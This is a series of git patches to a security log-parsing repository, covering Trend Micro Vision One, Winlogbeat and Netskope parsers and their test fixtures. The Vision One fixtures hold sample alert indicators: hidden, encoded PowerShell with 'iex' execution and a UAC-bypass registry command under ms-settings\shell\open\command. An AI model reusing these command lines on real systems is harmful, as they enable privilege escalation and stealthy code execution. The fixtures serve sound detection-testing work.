+      "id": "shockwave\\sam",
+      "name": "shockwave\\sam"
+    },
+    "process": {
+      "command_line": "c:\\windows\\system32\\windowspowershell\\v1.0\\powershell.exe -nop -noni -w hidden -enc ......aakaakaekavgaracqaswapackafabjaeuawaa=",
+      "executable": "c:\\windows\\system32\\windowspowershell\\v1.0\\powershell.exe",
+      "parent": {
+        "command_line": "c:\\windows\\system32\\windowspowershell\\v1.0\\powershell.exe -nop -noni -w hidden -c $x=$((gp hkcu:software\\microsoft\\windows update).update); powershell -nop -noni -w hidden -enc $x"
+      }
+    },
+    "related": {
+      "hash": [
+        "1B3B40FBC889FD4C645CC12C85D0805AC36BA254"
+      ],
+      "ip": [
+        "10.10.58.51"
+      ]
+    },
+    "rule": {
+      "name": "Credential Dumping via Mimikatz"
+    },
+    "trendmicro": {
+      "vision_one": {
+        "alert_id": "WB-9002-20220906-00023",
+        "investigation_status": "New",
+        "severity": "high",
+        "status": "Open"
+      }
+    }
+  }
+}
\ No newline at end of file
diff --git a/Trend Micro/trend-micro-vision-one/tests/test_registry.json b/Trend Micro/trend-micro-vision-one/tests/test_registry.json
new file mode 100644
index 000000000..093876a30
--- /dev/null
+++ b/Trend Micro/trend-micro-vision-one/tests/test_registry.json	
@@ -0,0 +1,72 @@
+{
+  "input": {
+    "message": "{\"schemaVersion\": \"1.12\", \"id\": \"WB-9002-20220906-00022\", \"investigationStatus\": \"New\", \"status\": \"Open\", \"investigationResult\": \"No Findings\", \"workbenchLink\": \"https://THE_WORKBENCH_URL\", \"alertProvider\": \"SAE\", \"modelId\": \"1ebd4f91-4b28-40b4-87f5-8defee4791d8\", \"model\": \"Privilege Escalation via UAC Bypass\", \"modelType\": \"preset\", \"score\": 64, \"severity\": \"high\", \"firstInvestigatedDateTime\": \"2022-10-06T02:30:31Z\", \"createdDateTime\": \"2022-09-06T02:49:31Z\", \"updatedDateTime\": \"2022-09-06T02:49:48Z\", \"incidentId\": \"IC-1-20230706-00001\", \"caseId\": \"CL-1-20230706-00001\", \"ownerIds\": [\"12345678-1234-1234-1234-123456789012\"], \"impactScope\": {\"desktopCount\": 1, \"serverCount\": 0, \"accountCount\": 1, \"emailAddressCount\": 1, \"containerCount\": 1, \"cloudIdentityCount\": 1, \"entities\": [{\"entityType\": \"account\", \"entityValue\": \"shockwave\\\\sam\", \"entityId\": \"shockwave\\\\sam\", \"relatedEntities\": [\"35FA11DA-A24E-40CF-8B56-BAF8828CC15E\"], \"relatedIndicatorIds\": [], \"provenance\": [\"Alert\"]}, {\"entityType\": \"host\", \"entityValue\": {\"guid\": \"35FA11DA-A24E-40CF-8B56-BAF8828CC15E\", \"name\": \"nimda\", \"ips\": [\"10.10.58.51\"]}, \"entityId\": \"35FA11DA-A24E-40CF-8B56-BAF8828CC15E\", \"managementScopeGroupId\": \"deadbeef-292e-42ae-86be-d2fef483a248\", \"managementScopeInstanceId\": \"1babc299-52de-44f4-a1d2-8a224f391eee\", \"managementScopePartitionKey\": \"4c1850c0-8a2a-4637-9f88-6afbab54dd79\", \"relatedEntities\": [\"shockwave\\\\sam\"], \"relatedIndicatorIds\": [1, 2, 3, 4, 5, 6, 7, 8], \"provenance\": [\"Alert\"]}, {\"entityType\": \"emailAddress\", \"entityValue\": \"support@pctutordetroit.com\", \"entityId\": \"SUPPORT@PCTUTORDETROIT.COM\", \"relatedEntities\": [], \"relatedIndicatorIds\": [], \"provenance\": [\"Alert\"]}, {\"entityType\": \"container\", \"entityValue\": \"k8s_democon_longrunl_default_09451f51-7124-4aa5-a5c4-ada24efe9da9_0\", \"entityId\": \"7d1e00176d78b2b1db0744a187314bf2ce39f3a7d43137c366ae6785e8a4f496\", \"relatedEntities\": [], \"relatedIndicatorIds\": [], \"provenance\": [\"Alert\"]}, {\"entityType\": \"cloudIdentity\", \"entityValue\": \"arn:aws:sts::985266316733:assumed-role/aad-admin/steven_hung\", \"entityId\": \"arn:aws:sts::985266316733:assumed-role/aad-admin/steven_hung\", \"relatedEntities\": [], \"relatedIndicatorIds\": [], \"provenance\": [\"Alert\"]}]}, \"description\": \"A user bypassed User Account Control (UAC) to gain higher-level permissions.\", \"matchedRules\": [{\"id\": \"25d96e5d-cb69-4935-ae27-43cc0cdca1cc\", \"name\": \"(T1088) Bypass UAC via shell open registry\", \"matchedFilters\": [{\"id\": \"ac200e74-8309-463e-ad6b-a4c16a3a377f\", \"name\": \"Bypass UAC Via Shell Open Default Registry\", \"matchedDateTime\": \"2022-09-05T03:53:49.802Z\", \"mitreTechniqueIds\": [\"T1112\", \"V9.T1112\", \"V9.T1548.002\"], \"matchedEvents\": [{\"uuid\": \"a32599b7-c0c9-45ed-97bf-f2be7679fb00\", \"matchedDateTime\": \"2022-09-05T03:53:49.802Z\", \"type\": \"TELEMETRY_REGISTRY\"}]}, {\"id\": \"857b6396-da29-44a8-bc11-25298e646795\", \"name\": \"Bypass UAC Via Shell Open Registry\", \"matchedDateTime\": \"2022-09-05T03:53:49.802Z\", \"mitreTechniqueIds\": [\"T1112\", \"T1088\", \"V9.T1112\", \"V9.T1548.002\"], \"matchedEvents\": [{\"uuid\": \"4c456bbb-2dfc-40a5-b298-799a0ccefc01\", \"matchedDateTime\": \"2022-09-05T03:53:49.802Z\", \"type\": \"TELEMETRY_REGISTRY\"}]}]}], \"indicators\": [{\"id\": 1, \"type\": \"command_line\", \"field\": \"processCmd\", \"value\": \"c:\\\\windows\\\\system32\\\\rundll32.exe c:\\\\users\\\\sam\\\\appdata\\\\local\\\\cyzfc.dat entrypoint\", \"relatedEntities\": [\"35FA11DA-A24E-40CF-8B56-BAF8828CC15E\"], \"filterIds\": [\"ac200e74-8309-463e-ad6b-a4c16a3a377f\"], \"provenance\": [\"Alert\"]}, {\"id\": 2, \"type\": \"command_line\", \"field\": \"parentCmd\", \"value\": \"C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\" -noni -win hidden -Ep ByPass $r = [Text.Encoding]::ASCII.GetString([Convert]::FromBase64String('....XggJHNjQjs=')); iex $r;  \", \"relatedEntities\": [\"35FA11DA-A24E-40CF-8B56-BAF8828CC15E\"], \"filterIds\": [\"ac200e74-8309-463e-ad6b-a4c16a3a377f\"], \"provenance\": [\"Alert\"]}, {\"id\": 3, \"type\": \"command_line\", \"field\": \"processCmd\", \"value\": \"c:\\\\windows\\\\system32\\\\rundll32.exe c:\\\\users\\\\sam\\\\appdata\\\\local\\\\cyzfc.dat entrypoint\", \"relatedEntities\": [\"35FA11DA-A24E-40CF-8B56-BAF8828CC15E\"], \"filterIds\": [\"857b6396-da29-44a8-bc11-25298e646795\"], \"provenance\": [\"Alert\"]}, {\"id\": 4, \"type\": \"command_line\", \"field\": \"parentCmd\", \"value\": \"C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\" -noni -win hidden -Ep ByPass $r = [Text.Encoding]::ASCII.GetString([Convert]::FromBase64String('....jY0KTtpZXggJHNjQjs=')); iex $r;  \", \"relatedEntities\": [\"35FA11DA-A24E-40CF-8B56-BAF8828CC15E\"], \"filterIds\": [\"857b6396-da29-44a8-bc11-25298e646795\"], \"provenance\": [\"Alert\"]}, {\"id\": 5, \"type\": \"registry_key\", \"field\": \"objectRegistryKeyHandle\", \"value\": \"hkcr\\\\ms-settings\\\\shell\\\\open\\\\command\", \"relatedEntities\": [\"35FA11DA-A24E-40CF-8B56-BAF8828CC15E\"], \"filterIds\": [\"ac200e74-8309-463e-ad6b-a4c16a3a377f\"], \"provenance\": [\"Alert\"]}, {\"id\": 6, \"type\": \"registry_key\", \"field\": \"objectRegistryKeyHandle\", \"value\": \"hkcr\\\\ms-settings\\\\shell\\\\open\\\\command\", \"relatedEntities\": [\"35FA11DA-A24E-40CF-8B56-BAF8828CC15E\"], \"filterIds\": [\"857b6396-da29-44a8-bc11-25298e646795\"], \"provenance\": [\"Alert\"]}, {\"id\": 7, \"type\": \"registry_value\", \"field\": \"objectRegistryValue\", \"value\": \"delegateexecute\", \"relatedEntities\": [\"35FA11DA-A24E-40CF-8B56-BAF8828CC15E\"], \"filterIds\": [\"857b6396-da29-44a8-bc11-25298e646795\"], \"provenance\": [\"Alert\"]}, {\"id\": 8, \"type\": \"registry_value_data\", \"field\": \"objectRegistryData\", \"value\": \"C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe -NoP -NonI -W Hidden -c $x=$((gp HKCU:Software\\\\Microsoft\\\\Windows Update).Update); powershell -NoP -NonI -W Hidden -enc $x\", \"relatedEntities\": [\"35FA11DA-A24E-40CF-8B56-BAF8828CC15E\"], \"filterIds\": [\"ac200e74-8309-463e-ad6b-a4c16a3a377f\"], \"provenance\": [\"Alert\"]}]}"
+  },
+  "expected": {
+    "message": "{\"schemaVersion\": \"1.12\", \"id\": \"WB-9002-20220906-00022\", \"investigationStatus\": \"New\", \"status\": \"Open\", \"investigationResult\": \"No Findings\", \"workbenchLink\": \"https://THE_WORKBENCH_URL\", \"alertProvider\": \"SAE\", \"modelId\": \"1ebd4f91-4b28-40b4-87f5-8defee4791d8\", \"model\": \"Privilege Escalation via UAC Bypass\", \"modelType\": \"preset\", \"score\": 64, \"severity\": \"high\", \"firstInvestigatedDateTime\": \"2022-10-06T02:30:31Z\", \"createdDateTime\": \"2022-09-06T02:49:31Z\", \"updatedDateTime\": \"2022-09-06T02:49:48Z\", \"incidentId\": \"IC-1-20230706-00001\", \"caseId\": \"CL-1-20230706-00001\", \"ownerIds\": [\"12345678-1234-1234-1234-123456789012\"], \"impactScope\": {\"desktopCount\": 1, \"serverCount\": 0, \"accountCount\": 1, \"emailAddressCount\": 1, \"containerCount\": 1, \"cloudIdentityCount\": 1, \"entities\": [{\"entityType\": \"account\", \"entityValue\": \"shockwave\\\\sam\", \"entityId\": \"shockwave\\\\sam\", \"relatedEntities\": [\"35FA11DA-A24E-40CF-8B56-BAF8828CC15E\"], \"relatedIndicatorIds\": [], \"provenance\": [\"Alert\"]}, {\"entityType\": \"host\", \"entityValue\": {\"guid\": \"35FA11DA-A24E-40CF-8B56-BAF8828CC15E\", \"name\": \"nimda\", \"ips\": [\"10.10.58.51\"]}, \"entityId\": \"35FA11DA-A24E-40CF-8B56-BAF8828CC15E\", \"managementScopeGroupId\": \"deadbeef-292e-42ae-86be-d2fef483a248\", \"managementScopeInstanceId\": \"1babc299-52de-44f4-a1d2-8a224f391eee\", \"managementScopePartitionKey\": \"4c1850c0-8a2a-4637-9f88-6afbab54dd79\", \"relatedEntities\": [\"shockwave\\\\sam\"], \"relatedIndicatorIds\": [1, 2, 3, 4, 5, 6, 7, 8], \"provenance\": [\"Alert\"]}, {\"entityType\": \"emailAddress\", \"entityValue\": \"support@pctutordetroit.com\", \"entityId\": \"SUPPORT@PCTUTORDETROIT.COM\", \"relatedEntities\": [], \"relatedIndicatorIds\": [], \"provenance\": [\"Alert\"]}, {\"entityType\": \"container\", \"entityValue\": \"k8s_democon_longrunl_default_09451f51-7124-4aa5-a5c4-ada24efe9da9_0\", \"entityId\": \"7d1e00176d78b2b1db0744a187314bf2ce39f3a7d43137c366ae6785e8a4f496\", \"relatedEntities\": [], \"relatedIndicatorIds\": [], \"provenance\": [\"Alert\"]}, {\"entityType\": \"cloudIdentity\", \"entityValue\": \"arn:aws:sts::985266316733:assumed-role/aad-admin/steven_hung\", \"entityId\": \"arn:aws:sts::985266316733:assumed-role/aad-admin/steven_hung\", \"relatedEntities\": [], \"relatedIndicatorIds\": [], \"provenance\": [\"Alert\"]}]}, \"description\": \"A user bypassed User Account Control (UAC) to gain higher-level permissions.\", \"matchedRules\": [{\"id\": \"25d96e5d-cb69-4935-ae27-43cc0cdca1cc\", \"name\": \"(T1088) Bypass UAC via shell open registry\", \"matchedFilters\": [{\"id\": \"ac200e74-8309-463e-ad6b-a4c16a3a377f\", \"name\": \"Bypass UAC Via Shell Open Default Registry\", \"matchedDateTime\": \"2022-09-05T03:53:49.802Z\", \"mitreTechniqueIds\": [\"T1112\", \"V9.T1112\", \"V9.T1548.002\"], \"matchedEvents\": [{\"uuid\": \"a32599b7-c0c9-45ed-97bf-f2be7679fb00\", \"matchedDateTime\": \"2022-09-05T03:53:49.802Z\", \"type\": \"TELEMETRY_REGISTRY\"}]}, {\"id\": \"857b6396-da29-44a8-bc11-25298e646795\", \"name\": \"Bypass UAC Via Shell Open Registry\", \"matchedDateTime\": \"2022-09-05T03:53:49.802Z\", \"mitreTechniqueIds\": [\"T1112\", \"T1088\", \"V9.T1112\", \"V9.T1548.002\"], \"matchedEvents\": [{\"uuid\": \"4c456bbb-2dfc-40a5-b298-799a0ccefc01\", \"matchedDateTime\": \"2022-09-05T03:53:49.802Z\", \"type\": \"TELEMETRY_REGISTRY\"}]}]}], \"indicators\": [{\"id\": 1, \"type\": \"command_line\", \"field\": \"processCmd\", \"value\": \"c:\\\\windows\\\\system32\\\\rundll32.exe c:\\\\users\\\\sam\\\\appdata\\\\local\\\\cyzfc.dat entrypoint\", \"relatedEntities\": [\"35FA11DA-A24E-40CF-8B56-BAF8828CC15E\"], \"filterIds\": [\"ac200e74-8309-463e-ad6b-a4c16a3a377f\"], \"provenance\": [\"Alert\"]}, {\"id\": 2, \"type\": \"command_line\", \"field\": \"parentCmd\", \"value\": \"C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\" -noni -win hidden -Ep ByPass $r = [Text.Encoding]::ASCII.GetString([Convert]::FromBase64String('....XggJHNjQjs=')); iex $r;  \", \"relatedEntities\": [\"35FA11DA-A24E-40CF-8B56-BAF8828CC15E\"], \"filterIds\": [\"ac200e74-8309-463e-ad6b-a4c16a3a377f\"], \"provenance\": [\"Alert\"]}, {\"id\": 3, \"type\": \"command_line\", \"field\": \"processCmd\", \"value\": \"c:\\\\windows\\\\system32\\\\rundll32.exe c:\\\\users\\\\sam\\\\appdata\\\\local\\\\cyzfc.dat entrypoint\", \"relatedEntities\": [\"35FA11DA-A24E-40CF-8B56-BAF8828CC15E\"], \"filterIds\": [\"857b6396-da29-44a8-bc11-25298e646795\"], \"provenance\": [\"Alert\"]}, {\"id\": 4, \"type\": \"command_line\", \"field\": \"parentCmd\", \"value\": \"C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\" -noni -win hidden -Ep ByPass $r = [Text.Encoding]::ASCII.GetString([Convert]::FromBase64String('....jY0KTtpZXggJHNjQjs=')); iex $r;  \", \"relatedEntities\": [\"35FA11DA-A24E-40CF-8B56-BAF8828CC15E\"], \"filterIds\": [\"857b6396-da29-44a8-bc11-25298e646795\"], \"provenance\": [\"Alert\"]}, {\"id\": 5, \"type\": \"registry_key\", \"field\": \"objectRegistryKeyHandle\", \"value\": \"hkcr\\\\ms-settings\\\\shell\\\\open\\\\command\", \"relatedEntities\": [\"35FA11DA-A24E-40CF-8B56-BAF8828CC15E\"], \"filterIds\": [\"ac200e74-8309-463e-ad6b-a4c16a3a377f\"], \"provenance\": [\"Alert\"]}, {\"id\": 6, \"type\": \"registry_key\", \"field\": \"objectRegistryKeyHandle\", \"value\": \"hkcr\\\\ms-settings\\\\shell\\\\open\\\\command\", \"relatedEntities\": [\"35FA11DA-A24E-40CF-8B56-BAF8828CC15E\"], \"filterIds\": [\"857b6396-da29-44a8-bc11-25298e646795\"], \"provenance\": [\"Alert\"]}, {\"id\": 7, \"type\": \"registry_value\", \"field\": \"objectRegistryValue\", \"value\": \"delegateexecute\", \"relatedEntities\": [\"35FA11DA-A24E-40CF-8B56-BAF8828CC15E\"], \"filterIds\": [\"857b6396-da29-44a8-bc11-25298e646795\"], \"provenance\": [\"Alert\"]}, {\"id\": 8, \"type\": \"registry_value_data\", \"field\": \"objectRegistryData\", \"value\": \"C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe -NoP -NonI -W Hidden -c $x=$((gp HKCU:Software\\\\Microsoft\\\\Windows Update).Update); powershell -NoP -NonI -W Hidden -enc $x\", \"relatedEntities\": [\"35FA11DA-A24E-40CF-8B56-BAF8828CC15E\"], \"filterIds\": [\"ac200e74-8309-463e-ad6b-a4c16a3a377f\"], \"provenance\": [\"Alert\"]}]}",
+    "event": {
+      "category": [
+        "intrusion_detection"
+      ],
+      "kind": "alert",
+      "type": [
+        "info"
+      ]
+    },
+    "@timestamp": "2022-09-06T02:49:31Z",
+    "container": {
+      "id": "7d1e00176d78b2b1db0744a187314bf2ce39f3a7d43137c366ae6785e8a4f496",
+      "name": "k8s_democon_longrunl_default_09451f51-7124-4aa5-a5c4-ada24efe9da9_0"
+    },
+    "host": {
+      "ip": [
+        "10.10.58.51"
+      ],
+      "name": "nimda"
+    },
+    "observer": {
+      "product": "Vision One",
+      "vendor": "TrendMicro"
+    },
+    "organization": {
+      "id": "shockwave\\sam",
+      "name": "shockwave\\sam"
+    },
+    "process": {
+      "command_line": "c:\\windows\\system32\\rundll32.exe c:\\users\\sam\\appdata\\local\\cyzfc.dat entrypoint",
+      "parent": {
+        "command_line": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -noni -win hidden -Ep ByPass $r = [Text.Encoding]::ASCII.GetString([Convert]::FromBase64String('....XggJHNjQjs=')); iex $r;  "
+      }
+    },
+    "registry": {
+      "data": {
+        "strings": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe -NoP -NonI -W Hidden -c $x=$((gp HKCU:Software\\Microsoft\\Windows Update).Update); powershell -NoP -NonI -W Hidden -enc $x"
+      },
+      "hive": "hkcr",
+      "key": "ms-settings\\shell\\open\\command",
+      "path": "hkcr\\ms-settings\\shell\\open\\command\\hkcr\\ms-settings\\shell\\open\\command\\delegateexecute",
+      "value": "delegateexecute"
+    },
+    "related": {
+      "ip": [
+        "10.10.58.51"
+      ]
+    },
+    "rule": {
+      "name": "Privilege Escalation via UAC Bypass"
+    },
+    "trendmicro": {
+      "vision_one": {
+        "alert_id": "WB-9002-20220906-00022",
+        "case_id": "CL-1-20230706-00001",
+        "incident_id": "IC-1-20230706-00001",
+        "investigation_status": "New",
+        "severity": "high",
+        "status": "Open"
+      }
+    },
+    "user": {
+      "email": "support@pctutordetroit.com"
+    }
+  }
+}
\ No newline at end of file

From f316fac6627ec461e64f6d3fa367286cf088a1ad Mon Sep 17 00:00:00 2001
From: lvoloshyn-sekoia <leonid.voloshyn@sekoia.io>
Date: Tue, 19 Nov 2024 09:52:34 +0200
Subject: [PATCH 248/317] Add smart descriptions

---
 .../trend-micro-vision-one/_meta/smart-descriptions.json    | 6 ++++++
 Trend Micro/trend-micro-vision-one/ingest/parser.yml        | 2 ++
 Trend Micro/trend-micro-vision-one/tests/test_process.json  | 1 +
 Trend Micro/trend-micro-vision-one/tests/test_registry.json | 1 +
 4 files changed, 10 insertions(+)

diff --git a/Trend Micro/trend-micro-vision-one/_meta/smart-descriptions.json b/Trend Micro/trend-micro-vision-one/_meta/smart-descriptions.json
index e69de29bb..7a3ee9d51 100644
--- a/Trend Micro/trend-micro-vision-one/_meta/smart-descriptions.json	
+++ b/Trend Micro/trend-micro-vision-one/_meta/smart-descriptions.json	
@@ -0,0 +1,6 @@
+[
+  {
+    "value": "{event.reason}",
+    "conditions": [{ "field": "event.reason" }]
+  }
+]
diff --git a/Trend Micro/trend-micro-vision-one/ingest/parser.yml b/Trend Micro/trend-micro-vision-one/ingest/parser.yml
index 38a31dd29..be400399d 100644
--- a/Trend Micro/trend-micro-vision-one/ingest/parser.yml	
+++ b/Trend Micro/trend-micro-vision-one/ingest/parser.yml	
@@ -20,6 +20,8 @@ stages:
           observer.vendor: "TrendMicro"
           observer.product: "Vision One"
 
+          event.reason: "{{parsed_event.message.model}}"
+
       - set:
           "@timestamp": "{{parsed_event.message.createdDateTime}}"
 
diff --git a/Trend Micro/trend-micro-vision-one/tests/test_process.json b/Trend Micro/trend-micro-vision-one/tests/test_process.json
index 5eca6b2ea..d6ef4acd1 100644
--- a/Trend Micro/trend-micro-vision-one/tests/test_process.json	
+++ b/Trend Micro/trend-micro-vision-one/tests/test_process.json	
@@ -9,6 +9,7 @@
         "intrusion_detection"
       ],
       "kind": "alert",
+      "reason": "Credential Dumping via Mimikatz",
       "type": [
         "info"
       ]
diff --git a/Trend Micro/trend-micro-vision-one/tests/test_registry.json b/Trend Micro/trend-micro-vision-one/tests/test_registry.json
index 093876a30..f9873edf1 100644
--- a/Trend Micro/trend-micro-vision-one/tests/test_registry.json	
+++ b/Trend Micro/trend-micro-vision-one/tests/test_registry.json	
@@ -9,6 +9,7 @@
         "intrusion_detection"
       ],
       "kind": "alert",
+      "reason": "Privilege Escalation via UAC Bypass",
       "type": [
         "info"
       ]

From 4b2aab06f6f6c739acc1bc9f1557ccc496ed6edc Mon Sep 17 00:00:00 2001
From: lvoloshyn-sekoia <leonid.voloshyn@sekoia.io>
Date: Tue, 19 Nov 2024 09:54:57 +0200
Subject: [PATCH 249/317] Add automation UUIDs

---
 Trend Micro/trend-micro-vision-one/_meta/manifest.yml | 2 ++
 1 file changed, 2 insertions(+)

diff --git a/Trend Micro/trend-micro-vision-one/_meta/manifest.yml b/Trend Micro/trend-micro-vision-one/_meta/manifest.yml
index c0121a28d..8363b7b96 100644
--- a/Trend Micro/trend-micro-vision-one/_meta/manifest.yml	
+++ b/Trend Micro/trend-micro-vision-one/_meta/manifest.yml	
@@ -1,4 +1,6 @@
 uuid: 9844ea0a-de7f-45d4-9a9b-b07651f0630e
+automation_connector_uuid: 7aa5dd7c-d694-44dd-b605-66b7974dfb05
+automation_module_uuid: 1b02d442-b804-4987-afe7-6a4be6ef35e6
 name: Trend Micro Vision One
 slug: trend-micro-vision-one
 

From fbbe4c415d5ff8c2fd61103b32f54b68711e66a7 Mon Sep 17 00:00:00 2001
From: LenaigKaliou <lenaigk@protonmail.com>
Date: Tue, 19 Nov 2024 09:44:23 +0100
Subject: [PATCH 250/317] small fixes on conditions

---
 .../winlogbeat/_meta/smart-descriptions.json  | 108 +++++++++++++++++-
 1 file changed, 105 insertions(+), 3 deletions(-)

diff --git a/Beats/winlogbeat/_meta/smart-descriptions.json b/Beats/winlogbeat/_meta/smart-descriptions.json
index b720b4ffb..d3979925e 100644
--- a/Beats/winlogbeat/_meta/smart-descriptions.json
+++ b/Beats/winlogbeat/_meta/smart-descriptions.json
@@ -205,6 +205,35 @@
       }
     ]
   },
+  {
+    "value": "{action.properties.SubjectDomainName}\\{action.properties.SubjectUserName} logged on to {host.name} with special privileges",
+    "relationships": [
+      {
+        "source": "user.name",
+        "target": "host.name",
+        "type": "logged on to"
+      }
+    ],
+    "conditions": [
+      {
+        "field": "action.id",
+        "value": 4672
+      },
+      {
+        "field": "winlog.provider_name",
+        "value": "Microsoft-Windows-Security-Auditing"
+      },
+      {
+        "field": "action.properties.SubjectDomainName"
+      },
+      {
+        "field": "action.properties.SubjectuserName"
+      },
+      {
+        "field": "host.name"
+      }
+    ]
+  },
   {
     "value": "{user.domain}\\{user.name} logged on to {host.name} with special privileges",
     "relationships": [
@@ -222,6 +251,15 @@
       {
         "field": "winlog.provider_name",
         "value": "Microsoft-Windows-Security-Auditing"
+      },
+      {
+        "field": "user.domain"
+      },
+      {
+        "field": "user.name"
+      },
+      {
+        "field": "host.name"
       }
     ]
   },
@@ -726,7 +764,7 @@
         "value": "Microsoft-Windows-Security-Auditing"
       },
       {
-        "field":"host.hostname"
+        "field": "host.hostname"
       }
     ]
   },
@@ -802,7 +840,7 @@
         "value": "Microsoft-Windows-Security-Auditing"
       },
       {
-        "field":"host.hostname"
+        "field": "host.hostname"
       }
     ]
   },
@@ -853,7 +891,7 @@
         "field": "source.ip"
       },
       {
-        "field":"host.hostname"
+        "field": "host.hostname"
       }
     ]
   },
@@ -1068,6 +1106,58 @@
       }
     ]
   },
+  {
+    "value": "{host.hostname} allowed a connection from {action.properties.SourceAddress}:{action.properties.SourcePort}",
+    "relationships": [
+      {
+        "source": "action.properties.SourceAddress",
+        "target": "action.properties.DestAddress",
+        "type": "connected to"
+      }
+    ],
+    "conditions": [
+      {
+        "field": "action.id",
+        "value": 5156
+      },
+      {
+        "field": "winlog.provider_name",
+        "value": "Microsoft-Windows-Security-Auditing"
+      },
+      {
+        "field": "action.properties.SourceAddress"
+      },
+      {
+        "field": "action.properties.SourcePort"
+      }
+    ]
+  },
+  {
+    "value": "{host.hostname} allowed a connection to {action.properties.DestAdress}:{action.properties.DestPort}",
+    "relationships": [
+      {
+        "source": "action.properties.SourceAddress",
+        "target": "action.properties.DestAddress",
+        "type": "connected to"
+      }
+    ],
+    "conditions": [
+      {
+        "field": "action.id",
+        "value": 5156
+      },
+      {
+        "field": "winlog.provider_name",
+        "value": "Microsoft-Windows-Security-Auditing"
+      },
+      {
+        "field": "action.properties.DestAddress"
+      },
+      {
+        "field": "action.properties.DestPort"
+      }
+    ]
+  },
   {
     "value": "{host.hostname} allowed a connection from {action.properties.SourceAddress}:{action.properties.SourcePort} to {action.properties.DestAdress}:{action.properties.DestPort}",
     "relationships": [
@@ -1085,6 +1175,18 @@
       {
         "field": "winlog.provider_name",
         "value": "Microsoft-Windows-Security-Auditing"
+      },
+      {
+        "field": "action.properties.SourceAddress"
+      },
+      {
+        "field": "action.properties.DestAddress"
+      },
+      {
+        "field": "action.properties.SourcePort"
+      },
+      {
+        "field": "action.properties.DestPort"
       }
     ]
   },

From 2207f3078290450fbbbcfe9b4584bf68d7a3fb49 Mon Sep 17 00:00:00 2001
From: LenaigKaliou <lenaigk@protonmail.com>
Date: Tue, 19 Nov 2024 09:47:15 +0100
Subject: [PATCH 251/317] fixing typo

---
 Beats/winlogbeat/_meta/smart-descriptions.json | 4 ++--
 1 file changed, 2 insertions(+), 2 deletions(-)

diff --git a/Beats/winlogbeat/_meta/smart-descriptions.json b/Beats/winlogbeat/_meta/smart-descriptions.json
index d3979925e..1d8547db9 100644
--- a/Beats/winlogbeat/_meta/smart-descriptions.json
+++ b/Beats/winlogbeat/_meta/smart-descriptions.json
@@ -1133,7 +1133,7 @@
     ]
   },
   {
-    "value": "{host.hostname} allowed a connection to {action.properties.DestAdress}:{action.properties.DestPort}",
+    "value": "{host.hostname} allowed a connection to {action.properties.DestAddress}:{action.properties.DestPort}",
     "relationships": [
       {
         "source": "action.properties.SourceAddress",
@@ -1159,7 +1159,7 @@
     ]
   },
   {
-    "value": "{host.hostname} allowed a connection from {action.properties.SourceAddress}:{action.properties.SourcePort} to {action.properties.DestAdress}:{action.properties.DestPort}",
+    "value": "{host.hostname} allowed a connection from {action.properties.SourceAddress}:{action.properties.SourcePort} to {action.properties.DestAddress}:{action.properties.DestPort}",
     "relationships": [
       {
         "source": "action.properties.SourceAddress",

From 6abd31bb9209f77aab598e290a7c8370a98a67ff Mon Sep 17 00:00:00 2001
From: LenaigKaliou <lenaigk@protonmail.com>
Date: Tue, 19 Nov 2024 10:55:07 +0100
Subject: [PATCH 252/317] Fixes on Netskope format

---
 Netskope/netskope_events/ingest/parser.yml    |   5 +-
 .../test_audit_log_deleted_inline_policy.json |   1 +
 .../test_audit_log_edit_admin_record.json     |   1 +
 .../tests/test_audit_log_login_failed.json    |   1 +
 .../test_audit_log_login_successful.json      |   1 +
 .../test_audit_log_logout_successful.json     |   1 +
 ..._audit_log_password_change_successful.json |   1 +
 .../tests/test_connection_log.json            |   1 +
 .../tests/test_dlp_incident.json              |   3 +-
 .../tests/test_malware_alert.json             |   5 +-
 .../tests/test_nspolicy_block.json            | 109 ++++++++++++++++
 .../tests/test_nspolicy_log.json              |   3 +-
 .../tests/test_nspolicy_upload.json           | 120 ++++++++++++++++++
 .../tests/test_user_alert.json                |   2 +-
 14 files changed, 248 insertions(+), 6 deletions(-)
 create mode 100644 Netskope/netskope_events/tests/test_nspolicy_block.json
 create mode 100644 Netskope/netskope_events/tests/test_nspolicy_upload.json

diff --git a/Netskope/netskope_events/ingest/parser.yml b/Netskope/netskope_events/ingest/parser.yml
index 1c33c07bc..7ce3a2543 100644
--- a/Netskope/netskope_events/ingest/parser.yml
+++ b/Netskope/netskope_events/ingest/parser.yml
@@ -36,7 +36,7 @@ stages:
           "@timestamp": "{{parse_date.datetime}}"
           observer.vendor: "Netskope"
           event.dataset: "{{parsed_event.message.type}}"
-          event.action: "{{parsed_event.message.activity}}"
+          event.action: "{{parsed_event.message.action or parsed_event.message.activity or 'Allow'}}"
           event.reason: "{{parsed_event.message.audit_log_event or parsed_event.message.bypass_reason}}"
           event.duration: "{{parsed_event.message.conn_duration}}"
           user_agent.original: "{{parsed_event.message.user_agent}}"
@@ -92,6 +92,9 @@ stages:
       - set:
           file.path: "{{parsed_event.message.file_path}}"
         filter: '{{parsed_event.message.file_path not in [None, "", "NA"]}}'
+      - set:
+          file.size: "{{parsed_event.message.file_size}}"
+        filter: "{{parsed_event.message.file_size not in [None, 0]}}"
       - translate:
         dictionary:
           "yes": "alert"
diff --git a/Netskope/netskope_events/tests/test_audit_log_deleted_inline_policy.json b/Netskope/netskope_events/tests/test_audit_log_deleted_inline_policy.json
index 67944d71d..df70ea26e 100644
--- a/Netskope/netskope_events/tests/test_audit_log_deleted_inline_policy.json
+++ b/Netskope/netskope_events/tests/test_audit_log_deleted_inline_policy.json
@@ -5,6 +5,7 @@
   "expected": {
